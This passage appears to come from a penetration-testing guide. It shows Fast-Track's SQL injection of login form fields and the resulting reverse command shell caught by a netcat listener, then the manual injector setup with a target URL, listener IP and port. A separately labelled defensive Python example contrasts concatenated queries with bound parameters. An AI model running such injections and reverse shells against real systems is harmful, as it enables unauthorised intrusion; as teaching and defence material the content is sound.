Fast-Track
Sending payload to parameter: txtLogin
Sending payload to parameter: txtPassword
[-] The PAYLOAD is being delivered. This can take up to two minutes. [-]
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
As you can see, Fast-Track handled the automatic detection of the POST
parameters and injected the attack, completely compromising the affected
system via SQL injection.
NOTE
You can also use FTP to deliver your payload, although outbound FTP
connections are generally blocked.
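On the defending side, the txtLogin and txtPassword parameters above are injectable only because their values reach the SQL parser as text. The following added example (not from the original text or from Fast-Track) contrasts string concatenation with a bound parameter and includes a regression check that submits a login containing a single quote. Assumptions: sqlite3 stands in for the SQL Server back end, and the table, sample rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data; sqlite3 stands in for the page's SQL Server."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, display TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "Alice A."), ("o'brien", "Pat O'Brien")])
    return db

def find_user_concatenated(db, form):
    """Vulnerable pattern: txtLogin is pasted into the SQL text."""
    sql = "SELECT display FROM users WHERE login = '" + form["txtLogin"] + "'"
    return db.execute(sql).fetchone()

def find_user_bound(db, form):
    """Hardened pattern: txtLogin is bound as a parameter, never parsed as SQL."""
    return db.execute("SELECT display FROM users WHERE login = ?",
                      (form["txtLogin"],)).fetchone()

def handles_quote_as_data(find_user, db):
    """Regression check: a login containing ' must come back as a normal row."""
    form = {"txtLogin": "o'brien", "txtPassword": "unused-here"}
    try:
        return find_user(db, form) == ("Pat O'Brien",)
    except sqlite3.Error:
        # The quote reached the SQL parser, so the field is injectable.
        return False

if __name__ == "__main__":
    db = make_db()
    for fn in (find_user_concatenated, find_user_bound):
        print(fn.__name__, "quote-safe:", handles_quote_as_data(fn, db))
```

The same check can be run against every form field of a handler as part of its test suite; any field that fails it is building SQL from user input.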
Manual Injection
If you have a different IP address listening for the reverse shell or you need
to fine-tune some of the configuration settings, you can set up the injector
manually.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice:
4
The manual portion allows you to customize your attack for whatever reason.
You will need to designate where in the URL the SQL Injection is by using
'INJECTHERE
So for example, when the tool asks you for the SQL Injectable URL, type:
http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the
injectible parameter
Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter here:
http://www.secmaniac.com/index.asp?id='INJECTHERE&date=2010
Enter the IP Address of server with NetCat Listening:
10.211.55.130
Enter Port number with NetCat listening:
9090